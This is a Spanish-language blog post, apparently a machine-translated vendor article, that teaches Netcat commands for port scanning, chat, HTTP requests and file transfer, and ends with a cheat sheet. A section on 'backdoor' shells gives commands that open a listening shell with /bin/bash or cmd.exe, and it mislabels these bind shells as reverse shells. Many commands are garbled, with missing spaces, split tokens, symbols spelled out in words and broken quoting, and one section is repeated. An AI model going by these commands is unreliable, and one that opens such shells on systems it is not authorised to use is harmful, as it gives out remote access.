Posted on by

Cómo usar comandos Netcat: ejemplos y hojas de trucos

El programa netcat utility admite una amplia gama de comandos para administrar redes y monitorear el flujo de datos de tráfico entre sistemas. Las redes informáticas, incluida la world Wide web, se basan en la columna vertebral del Protocolo de control de transmisión (TCP) y el Protocolo de datagramas de usuario (UDP). Piense en ello como una herramienta complementaria gratuita y fácil de usar junto con Wireshark, que se especializa en el análisis de paquetes de red., La versión original de Netcat se lanzó en 1995 y ha recibido una serie de actualizaciones iterativas en las décadas posteriores.,

  • comandos Netcat
    • exploración de puertos con comandos Netcat
    • Crear un Chat o servidor Web
    • exploración detallada con comandos Netcat
    • solicitudes HTTP con comandos Netcat
    • comandos TCP Server y TCP Client
    • elemento con comandos NetCat
    • Evitar la búsqueda de DNS con comandos Netcat
  • Scripting con Netcat
  • shell scripting with Netcat
  • launching Reverse (Backdoor) shells
  • printable Netcat cheat sheet
  • additional netcat Resources

What is netcat used for?,

Netcat puede ser una herramienta útil para cualquier equipo de ti, aunque el crecimiento de los servicios de red administrados internamente y la computación en la nube hacen que ese entorno en particular sea un ajuste natural. Los administradores de redes y sistemas deben ser capaces de identificar rápidamente cómo se está desempeñando su red y qué tipo de actividad está ocurriendo.

obtenga el libro electrónico gratuito Pen Testing Active Directory Environments

» esto realmente me abrió los ojos a la seguridad publicitaria de una manera que el trabajo defensivo nunca hizo.,»

Netcat funciona como una herramienta de back-end que permite la exploración de puertos y la escucha de puertos. Además, puede transferir archivos directamente a través de Netcat o usarlo como puerta trasera a otros sistemas en red. Asociado con una herramienta como Varonis Edge, recibiría una alerta de cualquier actividad inusual y luego podría usar Netcat para investigar. Por último, Netcat es una herramienta flexible debido a cómo se puede programar para tareas más grandes.,

comandos básicos Netcat

Una vez que haya configurado una aplicación Netcat en su servidor Windows o Linux, puede comenzar a ejecutar comandos básicos para probar su funcionalidad. Estos son algunos para comenzar:

nc-help – este comando imprimirá una lista de todos los comandos disponibles que puede usar en Netcat. Será útil si se encuentra con algún error al escribir un script o no está seguro de cómo proceder.

nc-z-v site.com -esto ejecutará un análisis básico del puerto del sitio web o servidor especificado., Netcat devolverá resultados detallados con listas de puertos y Estados. Tenga en cuenta que puede usar una dirección IP en lugar del dominio del sitio.

nc-l – Este comando le indicará al sistema local que comience a escuchar conexiones TCP y actividad UDP en un número de puerto específico.

nc site.com 1234 (less than) file_name – este comando iniciará la transferencia de un archivo basado en el número de puerto especificado.

Printf – Netcat puede funcionar como un servidor web simplificado. Este comando le permitirá guardar código HTML y publicarlo a través de su servidor local.,

sintaxis de comandos Netcat

todos los comandos Netcat deben comenzar con el identificador «netcat» o «nc» como una opción más corta. De forma predeterminada, la herramienta Netcat asumirá que desea realizar un análisis de puertos a menos que indique lo contrario.

se pueden usar diferentes parámetros de opción que incluyen: «- u «para el tráfico UDP en lugar de TCP,»- v «para la salida detallada,»- p «para especificar un puerto específico y»- D » para activar el modo de depuración completa. Los atributos individuales dentro de un comando Netcat deben estar separados con un espacio., El símbolo del sistema le informará si tiene un error tipográfico o un término no reconocido en su script.

exploración de puertos con comandos Netcat

al intentar diagnosticar un problema de red o de rendimiento, ejecutar una exploración de puertos con Netcat es un primer paso inteligente. El análisis Verificará el estado de todos los puertos en el dominio o la dirección IP dados para que pueda determinar si hay un firewall u otro mecanismo de bloqueo.

un comando básico de exploración de puertos para una dirección IP ncat se ve así:

nc-v-n 8.8.8.,8 1-1000

tenga en cuenta que los números al final del comando decirle a Netcat a sólo escaneo de puertos entre los números 1 y 1000.

si no conoce la dirección IP de un servidor o sitio web, puede buscarla a través de un comando ping terminal o simplemente insertar el dominio en el comando Netcat:

nc-v-n google.com 1-1000

siempre debe realizar exploraciones de puertos cuando esté conectado a su red empresarial local. Si no, puede configurar su enrutador con un servicio VPN para crear un túnel seguro en la red.,

crear un Chat o servidor web

Los programas de Chat están en aumento. Desde soluciones de código abierto hasta aquellas que parecían ganar popularidad de repente, hay una amplia gama de herramientas de chat y comunicación disponibles para las organizaciones empresariales. La realidad es que algunos expertos en ti y administradores de sistemas preferirían una solución simple de solo texto. Windows Netcat puede realmente llenar esa necesidad y permitir la transmisión de mensajes a través de una red local.

para comenzar, primero necesita Netcat para comenzar a escuchar en un número de Puerto., Asegúrese de no elegir un puerto que ya esté en uso por otra aplicación o servicio.

nc-l-p 1299

entonces todo lo que necesita hacer es iniciar la sesión de chat con una nueva conexión TCP:

nc localhost 1299

Este proceso también se puede usar para girar un servidor web básico desde su máquina local. Netcat funcionará como el servidor web y le permitirá almacenar contenido HTML que luego se puede ver a través de un navegador web.

primero, cree un nuevo documento de texto en su sistema local y asegúrese de usar etiquetas HTML válidas. A continuación, guarde el archivo como » index.,html » y almacenarlo en la raíz de su directorio Netcat. Ahora vuelva a la herramienta Netcat y ejecute este comando:

printf’ HTTP/1.1 200 OK\n\n%s ‘ «((cat index.html) » / netcat-l 8999

para ver el HTML en acción, simplemente abra cualquier navegador web y navegue a su dirección IP local con: 8999 al final para especificar el puerto del host.

análisis detallado con comandos Netcat

cada comando que ejecute en Netcat incluirá cierto texto de salida para indicar si se ejecutó correctamente o no., Con fines de solución de problemas y depuración, querrá recopilar tanta información y registros como sea posible, al tiempo que invierte en soluciones como Varonis Datalert para detectar amenazas y responder rápidamente. Netcat puede ayudar gracias al parámetro detallado que se puede agregar a cualquier comando básico de Netcat. Simplemente incluya «- v » a su comando y ejecútelo de nuevo.

incluso con esta configuración activada, Netcat no revelará ninguna de sus credenciales o datos de autenticación.

solicitudes HTTP con comandos Netcat

hemos explicado cómo puede usar Netcat para alojar páginas HTML en su sistema local., Pero el programa de utilidad también se puede utilizar para hacer solicitudes web a servidores externos. De esta manera, Netcat funcionará esencialmente como un navegador web al obtener código HTML sin procesar.

junto con una herramienta como Varonis Edge, Netcat puede ser útil para los profesionales de TI que buscan problemas de tráfico de internet o proxies. Aquí hay un ejemplo de cómo obtener el contenido HTML de la página de inicio de Google:

printf «GET/HTTP / 1.0\R \ n \ r \ n» | nc google.com 80

tenga en cuenta que el número de puerto 80 es necesario para este tipo de comando, ya que la world Wide web lo utiliza como un valor predeterminado para las conexiones TCP sobre IP.,

comandos TCP Server y TCP Client

aunque el protocolo TCP se utiliza principalmente para transferir tráfico web en todo el mundo, en realidad se puede implementar a nivel local para transferencias de archivos. Para lograr esto, necesita ejecutar Netcat desde dos ubicaciones: una que actuará como servidor para enviar el archivo y otra que actuará como cliente para recibirlo.

ejecute este comando Netcat en la instancia del servidor para enviar el archivo a través del puerto 1499:

nc-l 1499 > filename.,out

luego ejecute este comando en el cliente para aceptar, recibir y cerrar la conexión:

nc server.com 1499 (inferior a) filename.in

asegúrese de reemplazar «server.com» con el nombre de host completo o la dirección IP del servidor de envío.

elemento con comandos Netcat

las versiones más recientes de Netcat le permiten utilizar el formato de elemento para transferir datos en lugar de los protocolos TCP o UDP estándar., Para lograr esto, debe seguir esta sintaxis:

file_path (pipe) device_path (pipe) network host

evitar la búsqueda de DNS con comandos Netcat

Los comandos Netcat se ejecutan más rápido cuando operan exclusivamente en direcciones IP. Esto se debe a que no se pierde tiempo hablando con los servidores de nombres de dominio (DNS) para traducir los nombres de los servidores en direcciones IP. Si encuentra que sus comandos de Netcat todavía se están ejecutando lentamente, asegúrese de agregar el operador «- n » para que la utilidad sepa que no se requieren búsquedas de DNS.,

Shell Scripting con Netcat

como se mencionó anteriormente, uno de los beneficios de usar Netcat es que se puede incluir como parte de un script más grande que realiza una función automatizada. Como parte de sus procedimientos de seguridad, es posible que desee ejecutar un análisis completo de puertos en todos sus servidores para detectar nuevas aplicaciones maliciosas que estén escuchando una conexión.

podría escribir un script que:

1. Importa un archivo de texto de nombres de servidor o direcciones IP
2. Llama a Netcat para ejecutar un análisis de puertos en cada servidor
3., Escribe la salida en un nuevo archivo de texto para su análisis

Se pueden agrupar varios comandos Netcat en un solo script y ejecutarlos a través de un shell de Linux o Windows. En algunos casos, puede valer la pena tener los scripts en un horario regular.

lanzamiento de Shells inversos (Backdoor)

Para comenzar, debe habilitar la herramienta shell a través de un comando Netcat utilizando netcat reverse shell:

nc-n-v-l-p 5555-e /bin/bash

luego, desde cualquier otro sistema de la red, puede probar cómo ejecutar comandos en el host después de una conexión Netcat exitosa en bash.,

nc-nv 127.0.0.1 5555

un shell inverso es un enfoque de acceso remoto en el que se ejecutan comandos administrativos desde un terminal mientras se conecta a otro servidor de la red. Para comenzar, debe habilitar la herramienta shell a través de un comando Netcat utilizando netcat reverse shell:

nc-n-v-l-p 5555-e /bin/bash

luego, desde cualquier otro sistema de la red, puede probar cómo ejecutar comandos en el host seleccionado después de una conexión Netcat exitosa en bash:

nc-NV 127.0.0.,1 5555

Netcat Cheat Sheet

hasta que comience a usar Netcat de forma regular, puede confundirse con la sintaxis de comandos u olvidar lo que hacen algunos de los parámetros. No te preocupes! Hemos incluido una hoja de trucos a continuación para ayudarlo a encontrar lo que necesita rápidamente para ejecutar un comando Netcat que funcione.,

Netcat Fundamentals

nc – de forma predeterminada, esto ejecutará un análisis de puertos

nc-l – inicia un receptor en el puerto dado

Netcat Command Flags

nc -4 – use IPv4 only

nc -6 – use IPv6

NC-u – use UDP en lugar de TCP

NC-K-L – continúe escuchando después de la desconexión

NC-N – omita las búsquedas DNS

NC-V – proporcione una salida detallada

Relés netcat en Windows

NC > relé.bat-abrir una conexión de relé

relé nc-l-p-E.,bat-connect to relay

Netcat Relays on Linux

nc-l-p 0 (less than) backpipe (pipe) nc (pipe) Tee backpipe

Netcat File Transfer

nc (greater than) file_name.enviar un archivo

nc (menos que) file_name.in -recibir un archivo

Netcat Port Scanner

nc-zv site.com 80-escanear un solo puerto

nc-zv hostname.com 80 84 – escanear un conjunto de puertos individuales

sitio nc-zv.,com 80-84 – escanear un rango de puertos

Netcat Banners

echo «» | nc -zv -wl – obtener el TCP banners para un rango de puertos

Netcat Backdoor Conchas

nc -l -p -e /bin/bash – ejecutar un shell en Linux

nc -l -p -e cmd.,exe-ejecute un shell en Netcat para Windows

recursos adicionales de Netcat

  • Todo el potencial de Netcat
  • usando Netcat con RedHat
  • Introducción a Netcat en Youtube
  • Netcat para la seguridad
  • lecciones divertidas con Netcat

en el mundo actual de la tecnología en rápido cambio y las redes cada vez más complejas, las empresas deben ser proactivas cuando se trata de ciberseguridad. Eso significa contratar expertos que sepan qué amenazas buscar y cómo combatirlas., De lo contrario, una sola instancia de un ciberataque como el ransomware podría provocar daños duraderos para toda la organización. Emparejar las soluciones de Varonis con herramientas como Netcat ayudará a mantener su red interna más segura.

Published by admin

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *